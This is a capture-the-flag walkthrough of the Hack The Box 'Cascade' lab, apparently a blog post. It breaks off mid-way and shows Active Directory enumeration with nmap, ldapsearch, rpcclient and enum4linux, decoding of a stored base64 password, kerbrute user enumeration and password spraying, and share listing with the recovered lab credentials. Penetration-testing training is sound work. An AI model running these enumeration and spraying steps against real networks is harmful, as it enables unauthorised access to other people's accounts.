Forem: Michael Oladele The latest articles on Forem by Michael Oladele (@micheaol). https://forem.com/micheaol https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F631913%2F9d0df0be-e332-4bf8-861c-ccc93f33e111.jpg Forem: Michael Oladele https://forem.com/micheaol en HTB - Cascade walkthrough Michael Oladele Thu, 07 May 2026 11:27:04 +0000 https://forem.com/micheaol/htb-cascade-walkthrough-1pik https://forem.com/micheaol/htb-cascade-walkthrough-1pik <h2> Initial Enumeration </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>nmap <span class="nt">-A</span> <span class="nt">-p-</span> 10.129.29.246 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-05-06 18:59 CDT Nmap scan report <span class="k">for </span>10.129.29.246 Host is up <span class="o">(</span>0.0082s latency<span class="o">)</span><span class="nb">.</span> Not shown: 65520 filtered tcp ports <span class="o">(</span>no-response<span class="o">)</span> PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 <span class="o">(</span>1DB15D39<span class="o">)</span> <span class="o">(</span>Windows Server 2008 R2 SP1<span class="o">)</span> | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 <span class="o">(</span>1DB15D39<span class="o">)</span> 88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server <span class="nb">time</span>: 2026-05-07 00:01:21Z<span class="o">)</span> 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: cascade.local, Site: Default-First-Site-Name<span class="o">)</span> 445/tcp open microsoft-ds? 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: cascade.local, Site: Default-First-Site-Name<span class="o">)</span> 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device <span class="nb">type</span>: general purpose|phone|specialized Running <span class="o">(</span>JUST GUESSING<span class="o">)</span>: Microsoft Windows 8|Phone|7|2008|8.1|Vista <span class="o">(</span>92%<span class="o">)</span> OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 <span class="o">(</span>92%<span class="o">)</span>, Microsoft Windows Phone 7.5 or 8.0 <span class="o">(</span>92%<span class="o">)</span>, Microsoft Windows Embedded Standard 7 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows 7 or Windows Server 2008 R2 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows Server 2008 R2 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows Server 2008 R2 or Windows 8.1 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows Server 2008 R2 SP1 or Windows 8 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows 7 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows 7 Professional or Windows 8 <span class="o">(</span>89%<span class="o">)</span>, Microsoft Windows 7 SP1 or Windows Server 2008 R2 <span class="o">(</span>89%<span class="o">)</span> No exact OS matches <span class="k">for </span>host <span class="o">(</span><span class="nb">test </span>conditions non-ideal<span class="o">)</span><span class="nb">.</span> Network Distance: 2 hops Service Info: Host: CASC-DC1<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: | smb2-time: | <span class="nb">date</span>: 2026-05-07T00:02:17 |_ start_date: 2026-05-06T23:56:22 |_clock-skew: 2s | smb2-security-mode: | 2:1:0: |_ Message signing enabled and required TRACEROUTE <span class="o">(</span>using port 445/tcp<span class="o">)</span> HOP RTT ADDRESS 1 8.51 ms 10.10.14.1 2 8.66 ms 10.129.29.246 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>203.64 seconds </code></pre> </div> <p>We got the following from the above scan:</p> <ol> <li>This AD machine</li> <li>Domain: cascade.local</li> </ol> <p>Let's enumerate further:</p> <p>We futher confirm the domain with ldapsearch<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>ldapsearch <span class="nt">-x</span> <span class="nt">-H</span> ldap://10.129.29.246 <span class="nt">-s</span> base <span class="nt">-b</span> <span class="s2">""</span> <span class="s2">"(objectClass=*)"</span> namingContexts <span class="c"># extended LDIF</span> <span class="c">#</span> <span class="c"># LDAPv3</span> <span class="c"># base &lt;&gt; with scope baseObject</span> <span class="c"># filter: (objectClass=*)</span> <span class="c"># requesting: namingContexts </span> <span class="c">#</span> <span class="c">#</span> dn: namingContexts: <span class="nv">DC</span><span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local </span>namingContexts: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local </span>namingContexts: <span class="nv">CN</span><span class="o">=</span>Schema,CN<span class="o">=</span>Configuration,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local </span>namingContexts: <span class="nv">DC</span><span class="o">=</span>DomainDnsZones,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local </span>namingContexts: <span class="nv">DC</span><span class="o">=</span>ForestDnsZones,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local</span> <span class="c"># search result</span> search: 2 result: 0 Success <span class="c"># numResponses: 2</span> <span class="c"># numEntries: 1</span> </code></pre> </div> <p>As part of enumeration, I checked <code>cascadeLegacyPwd</code> with ldapsearch and got back <code>Ryan Thompson password: clk0bjVldmE=</code></p> <p>The password seems to be encoded with base64, so let's decode it<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s2">"clk0bjVldmE="</span> | <span class="nb">base64</span> <span class="nt">-d</span> </code></pre> </div> <p>We got back Ryan plaintext password: <code>rY4n5eva</code></p> <p>Now that we have a valid credentials, let's enumerate further with ldapsearch:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>──╼ <span class="o">[</span>★]<span class="nv">$ </span>ldapsearch <span class="nt">-x</span> <span class="nt">-H</span> ldap://10.129.29.246 <span class="nt">-b</span> <span class="s2">"dc=cascade,dc=local"</span> <span class="s2">"(cascadeLegacyPwd=*)"</span> cascadeLegacyPwd <span class="c"># extended LDIF</span> <span class="c">#</span> <span class="c"># LDAPv3</span> <span class="c"># base &lt;dc=cascade,dc=local&gt; with scope subtree</span> <span class="c"># filter: (cascadeLegacyPwd=*)</span> <span class="c"># requesting: cascadeLegacyPwd </span> <span class="c">#</span> <span class="c"># Ryan Thompson, Users, UK, cascade.local</span> dn: <span class="nv">CN</span><span class="o">=</span>Ryan Thompson,OU<span class="o">=</span>Users,OU<span class="o">=</span>UK,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local </span>cascadeLegacyPwd: <span class="nv">clk0bjVldmE</span><span class="o">=</span> <span class="c"># search reference</span> ref: ldap://ForestDnsZones.cascade.local/DC<span class="o">=</span>ForestDnsZones,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local</span> <span class="c"># search reference</span> ref: ldap://DomainDnsZones.cascade.local/DC<span class="o">=</span>DomainDnsZones,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local</span> <span class="c"># search reference</span> ref: ldap://cascade.local/CN<span class="o">=</span>Configuration,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local</span> <span class="c"># search result</span> search: 2 result: 0 Success <span class="c"># numResponses: 5</span> <span class="c"># numEntries: 1</span> <span class="c"># numReferences: 3</span> </code></pre> </div> <p>I was able to get some users back with RPCClient:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>rpcclient <span class="nt">-U</span> <span class="s2">""</span> <span class="nt">-N</span> 10.129.29.246 rpcclient <span class="nv">$&gt;</span> rpcclient <span class="nv">$&gt;</span> enumdomusers user:[CascGuest] rid:[0x1f5] user:[arksvc] rid:[0x452] user:[s.smith] rid:[0x453] user:[r.thompson] rid:[0x455] user:[util] rid:[0x457] user:[j.wakefield] rid:[0x45c] user:[s.hickson] rid:[0x461] user:[j.goodhand] rid:[0x462] user:[a.turnbull] rid:[0x464] user:[e.crowe] rid:[0x467] user:[b.hanson] rid:[0x468] user:[d.burman] rid:[0x469] user:[BackupSvc] rid:[0x46a] user:[j.allen] rid:[0x46e] user:[i.croft] rid:[0x46f] I further enumerate domain with enum4linux and I got back some <span class="nb">users </span>and some domains info: ┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>enum4linux 10.129.29.246 ENUM4LINUX - next generation <span class="o">(</span>v1.3.4<span class="o">)</span> <span class="o">==========================</span> | Target Information | <span class="o">==========================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Target ........... 10.129.29.246 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Username ......... <span class="s1">''</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Random Username .. <span class="s1">'pnpssmjg'</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Password ......... <span class="s1">''</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Timeout .......... 5 second<span class="o">(</span>s<span class="o">)</span> <span class="o">======================================</span> | Listener Scan on 10.129.29.246 | <span class="o">======================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking LDAP <span class="o">[</span>+] LDAP is accessible on 389/tcp <span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking LDAPS <span class="o">[</span>+] LDAPS is accessible on 636/tcp <span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking SMB <span class="o">[</span>+] SMB is accessible on 445/tcp <span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking SMB over NetBIOS <span class="o">[</span>+] SMB over NetBIOS is accessible on 139/tcp <span class="o">=====================================================</span> | Domain Information via LDAP <span class="k">for </span>10.129.29.246 | <span class="o">=====================================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Trying LDAP <span class="o">[</span>+] Appears to be root/parent DC <span class="o">[</span>+] Long domain name is: cascade.local <span class="o">============================================================</span> | NetBIOS Names and Workgroup/Domain <span class="k">for </span>10.129.29.246 | <span class="o">============================================================</span> <span class="o">[</span>-] Could not get NetBIOS names information via <span class="s1">'nmblookup'</span>: timed out <span class="o">==========================================</span> | SMB Dialect Check on 10.129.29.246 | <span class="o">==========================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Trying on 445/tcp <span class="o">[</span>+] Supported dialects and settings: Supported dialects: SMB 1.0: <span class="nb">false </span>SMB 2.02: <span class="nb">true </span>SMB 2.1: <span class="nb">true </span>SMB 3.0: <span class="nb">false </span>SMB 3.1.1: <span class="nb">false </span>Preferred dialect: SMB 2.1 SMB1 only: <span class="nb">false </span>SMB signing required: <span class="nb">true</span> <span class="o">============================================================</span> | Domain Information via SMB session <span class="k">for </span>10.129.29.246 | <span class="o">============================================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating via unauthenticated SMB session on 445/tcp <span class="o">[</span>+] Found domain information via SMB NetBIOS computer name: CASC-DC1 NetBIOS domain name: CASCADE DNS domain: cascade.local FQDN: CASC-DC1.cascade.local Derived membership: domain member Derived domain: CASCADE <span class="o">==========================================</span> | RPC Session Check on 10.129.29.246 | <span class="o">==========================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Check <span class="k">for </span>null session <span class="o">[</span>+] Server allows session using username <span class="s1">''</span>, password <span class="s1">''</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Check <span class="k">for </span>random user <span class="o">[</span>-] Could not establish random user session: STATUS_LOGON_FAILURE <span class="o">====================================================</span> | Domain Information via RPC <span class="k">for </span>10.129.29.246 | <span class="o">====================================================</span> <span class="o">[</span>+] Domain: CASCADE <span class="o">[</span>+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453 <span class="o">[</span>+] Membership: domain member <span class="o">================================================</span> | OS Information via RPC <span class="k">for </span>10.129.29.246 | <span class="o">================================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating via unauthenticated SMB session on 445/tcp <span class="o">[</span>+] Found OS information via SMB <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating via <span class="s1">'srvinfo'</span> <span class="o">[</span>-] Could not get OS info via <span class="s1">'srvinfo'</span>: STATUS_ACCESS_DENIED <span class="o">[</span>+] After merging OS information we have the following result: OS: Windows 7, Windows Server 2008 R2 OS version: <span class="s1">'6.1'</span> OS release: <span class="s1">''</span> OS build: <span class="s1">'7601'</span> Native OS: not supported Native LAN manager: not supported Platform <span class="nb">id</span>: null Server <span class="nb">type</span>: null Server <span class="nb">type </span>string: null <span class="o">======================================</span> | Users via RPC on 10.129.29.246 | <span class="o">======================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">users </span>via <span class="s1">'querydispinfo'</span> <span class="o">[</span>+] Found 15 user<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'querydispinfo'</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">users </span>via <span class="s1">'enumdomusers'</span> <span class="o">[</span>+] Found 15 user<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'enumdomusers'</span> <span class="o">[</span>+] After merging user results we have 15 user<span class="o">(</span>s<span class="o">)</span> total: <span class="s1">'1106'</span>: username: arksvc name: ArkSvc acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1107'</span>: username: s.smith name: Steve Smith acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1109'</span>: username: r.thompson name: Ryan Thompson acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1111'</span>: username: util name: Util acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1116'</span>: username: j.wakefield name: James Wakefield acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1121'</span>: username: s.hickson name: Stephanie Hickson acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1122'</span>: username: j.goodhand name: John Goodhand acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1124'</span>: username: a.turnbull name: Adrian Turnbull acb: <span class="s1">'0x00000214'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1127'</span>: username: e.crowe name: Edward Crowe acb: <span class="s1">'0x00000211'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1128'</span>: username: b.hanson name: Ben Hanson acb: <span class="s1">'0x00000211'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1129'</span>: username: d.burman name: David Burman acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1130'</span>: username: BackupSvc name: BackupSvc acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1134'</span>: username: j.allen name: Joseph Allen acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1135'</span>: username: i.croft name: Ian Croft acb: <span class="s1">'0x00000211'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'501'</span>: username: CascGuest name: <span class="o">(</span>null<span class="o">)</span> acb: <span class="s1">'0x00000215'</span> description: Built-in account <span class="k">for </span>guest access to the computer/domain <span class="o">=======================================</span> | Groups via RPC on 10.129.29.246 | <span class="o">=======================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">local groups</span> <span class="o">[</span>+] Found 17 group<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'enumalsgroups domain'</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">builtin groups</span> <span class="o">[</span>+] Found 15 group<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'enumalsgroups builtin'</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating domain <span class="nb">groups</span> <span class="o">[</span>+] Found 6 group<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'enumdomgroups'</span> <span class="o">[</span>+] After merging <span class="nb">groups </span>results we have 38 group<span class="o">(</span>s<span class="o">)</span> total: <span class="s1">'1102'</span>: groupname: DnsAdmins <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1103'</span>: groupname: DnsUpdateProxy <span class="nb">type</span>: domain <span class="s1">'1113'</span>: groupname: IT <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1114'</span>: groupname: Production <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1115'</span>: groupname: HR <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1119'</span>: groupname: AD Recycle Bin <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1120'</span>: groupname: Backup <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1123'</span>: groupname: Temps <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1125'</span>: groupname: WinRMRemoteWMIUsers__ <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1126'</span>: groupname: Remote Management Users <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1132'</span>: groupname: Factory <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1133'</span>: groupname: Finance <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1137'</span>: groupname: Audit Share <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1138'</span>: groupname: Data Share <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'498'</span>: groupname: Enterprise Read-only Domain Controllers <span class="nb">type</span>: domain <span class="s1">'513'</span>: groupname: Domain Users <span class="nb">type</span>: domain <span class="s1">'514'</span>: groupname: Domain Guests <span class="nb">type</span>: domain <span class="s1">'515'</span>: groupname: Domain Computers <span class="nb">type</span>: domain <span class="s1">'517'</span>: groupname: Cert Publishers <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'520'</span>: groupname: Group Policy Creator Owners <span class="nb">type</span>: domain <span class="s1">'545'</span>: groupname: Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'546'</span>: groupname: Guests <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'553'</span>: groupname: RAS and IAS Servers <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'554'</span>: groupname: Pre-Windows 2000 Compatible Access <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'555'</span>: groupname: Remote Desktop Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'556'</span>: groupname: Network Configuration Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'557'</span>: groupname: Incoming Forest Trust Builders <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'558'</span>: groupname: Performance Monitor Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'559'</span>: groupname: Performance Log Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'560'</span>: groupname: Windows Authorization Access Group <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'561'</span>: groupname: Terminal Server License Servers <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'562'</span>: groupname: Distributed COM Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'568'</span>: groupname: IIS_IUSRS <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'569'</span>: groupname: Cryptographic Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'571'</span>: groupname: Allowed RODC Password Replication Group <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'572'</span>: groupname: Denied RODC Password Replication Group <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'573'</span>: groupname: Event Log Readers <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'574'</span>: groupname: Certificate Service DCOM Access <span class="nb">type</span>: <span class="nb">builtin</span> <span class="o">=======================================</span> | Shares via RPC on 10.129.29.246 | <span class="o">=======================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating shares <span class="o">[</span>+] Found 0 share<span class="o">(</span>s<span class="o">)</span> <span class="k">for </span>user <span class="s1">''</span> with password <span class="s1">''</span>, try a different user <span class="o">==========================================</span> | Policies via RPC <span class="k">for </span>10.129.29.246 | <span class="o">==========================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Trying port 445/tcp <span class="o">[</span>+] Found policy: Domain password information: Password <span class="nb">history </span>length: None Minimum password length: 5 Maximum password age: not <span class="nb">set </span>Password properties: - DOMAIN_PASSWORD_COMPLEX: <span class="nb">false</span> - DOMAIN_PASSWORD_NO_ANON_CHANGE: <span class="nb">false</span> - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: <span class="nb">false</span> - DOMAIN_PASSWORD_LOCKOUT_ADMINS: <span class="nb">false</span> - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: <span class="nb">false</span> - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: <span class="nb">false </span>Domain lockout information: Lockout observation window: 30 minutes Lockout duration: 30 minutes Lockout threshold: None Domain logoff information: Force logoff <span class="nb">time</span>: not <span class="nb">set</span> <span class="o">==========================================</span> | Printers via RPC <span class="k">for </span>10.129.29.246 | <span class="o">==========================================</span> <span class="o">[</span>-] Could not get printer info via <span class="s1">'enumprinters'</span>: STATUS_ACCESS_DENIED Completed after 6.83 seconds </code></pre> </div> <p>Let's format the domain usernames:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="nb">grep</span> <span class="s2">"username:"</span> users.txt | <span class="nb">awk</span> <span class="s1">'{gsub(/^\$/, "", $2); print $2}'</span> <span class="o">&gt;</span> usernames.txt </code></pre> </div> <p>With the list ready, let's confirm which names are valid with kerbrute:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>./kerbrute userenum <span class="nt">-d</span> cascade.local domain_users.txt <span class="nt">--dc</span> 10.129.29.246 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ <span class="se">\/</span> ___/ __ <span class="se">\/</span> ___/ / / / __/ _ <span class="se">\</span> / ,&lt; / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|<span class="se">\_</span>__/_/ /_.___/_/ <span class="se">\_</span>_,_/<span class="se">\_</span>_/<span class="se">\_</span>__/ Version: v1.0.3 <span class="o">(</span>9dad6e1<span class="o">)</span> - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 19:34:50 <span class="o">&gt;</span> Using KDC<span class="o">(</span>s<span class="o">)</span>: 2026/05/06 19:34:50 <span class="o">&gt;</span> 10.129.29.246:88 2026/05/06 19:34:55 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: s.smith@cascade.local 2026/05/06 19:34:55 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: arksvc@cascade.local 2026/05/06 19:34:55 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: j.goodhand@cascade.local 2026/05/06 19:34:55 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: a.turnbull@cascade.local 2026/05/06 19:34:55 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: s.hickson@cascade.local 2026/05/06 19:34:55 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: util@cascade.local 2026/05/06 19:34:55 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: r.thompson@cascade.local 2026/05/06 19:34:55 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: j.wakefield@cascade.local 2026/05/06 19:35:00 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: BackupSvc@cascade.local 2026/05/06 19:35:00 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: d.burman@cascade.local 2026/05/06 19:35:00 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: j.allen@cascade.local 2026/05/06 19:35:00 <span class="o">&gt;</span> Done! Tested 15 usernames <span class="o">(</span>11 valid<span class="o">)</span> <span class="k">in </span>10.036 seconds </code></pre> </div> <p>Out of 15names, we got back 11 valid name, let's move to AS-REP Roasting with GetNPUsers.py and no luck.</p> <p>Let's try the Ryan password we got earlier to see if there is a password re-use<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>./kerbrute passwordspray <span class="nt">-d</span> cascade.local <span class="nt">--dc</span> 10.129.29.246 valid_names.txt <span class="s2">"rY4n5eva"</span> __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ <span class="se">\/</span> ___/ __ <span class="se">\/</span> ___/ / / / __/ _ <span class="se">\</span> / ,&lt; / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|<span class="se">\_</span>__/_/ /_.___/_/ <span class="se">\_</span>_,_/<span class="se">\_</span>_/<span class="se">\_</span>__/ Version: v1.0.3 <span class="o">(</span>9dad6e1<span class="o">)</span> - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 20:22:23 <span class="o">&gt;</span> Using KDC<span class="o">(</span>s<span class="o">)</span>: 2026/05/06 20:22:23 <span class="o">&gt;</span> 10.129.29.246:88 2026/05/06 20:22:36 <span class="o">&gt;</span> <span class="o">[</span>+] VALID LOGIN: r.thompson@cascade.local:rY4n5eva 2026/05/06 20:22:43 <span class="o">&gt;</span> Done! Tested 11 logins <span class="o">(</span>1 successes<span class="o">)</span> <span class="k">in </span>20.084 seconds </code></pre> </div> <p>We confirm no password re-use and also confirm that thompson password is valid, so we have our first credentials r.thompson:rY4n5eva</p> <p>I tried to get into the host with evil_winrm and RDP but no luck so I tried to see what shared do I have READ access to via crackmapexec:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>crackmapexec smb 10.129.29.246 <span class="nt">-u</span> <span class="s1">'r.thompson'</span> <span class="nt">-p</span> <span class="s1">'rY4n5eva'</span> <span class="nt">--shares</span> SMB 10.129.29.246 445 CASC-DC1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 7 / Server 2008 R2 Build 7601 x64 <span class="o">(</span>name:CASC-DC1<span class="o">)</span> <span class="o">(</span>domain:cascade.local<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> SMB 10.129.29.246 445 CASC-DC1 <span class="o">[</span>+] cascade.local<span class="se">\r</span>.thompson:rY4n5eva SMB 10.129.29.246 445 CASC-DC1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerated shares SMB 10.129.29.246 445 CASC-DC1 Share Permissions Remark SMB 10.129.29.246 445 CASC-DC1 <span class="nt">-----</span> <span class="nt">-----------</span> <span class="nt">------</span> SMB 10.129.29.246 445 CASC-DC1 ADMIN<span class="nv">$ </span> Remote Admin SMB 10.129.29.246 445 CASC-DC1 Audit<span class="nv">$ </span> SMB 10.129.29.246 445 CASC-DC1 C<span class="nv">$ </span> Default share SMB 10.129.29.246 445 CASC-DC1 Data READ SMB 10.129.29.246 445 CASC-DC1 IPC<span class="nv">$ </span> Remote IPC SMB 10.129.29.246 445 CASC-DC1 NETLOGON READ Logon server share SMB 10.129.29.246 445 CASC-DC1 print<span class="nv">$ </span> READ Printer Drivers SMB 10.129.29.246 445 CASC-DC1 SYSVOL READ Logon server share </code></pre> </div> <p>r.thompson has read access on Data, so let's get into data with SMBclient and start our enumeration:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwh74ly7w5bfkaw69xn2a.png" 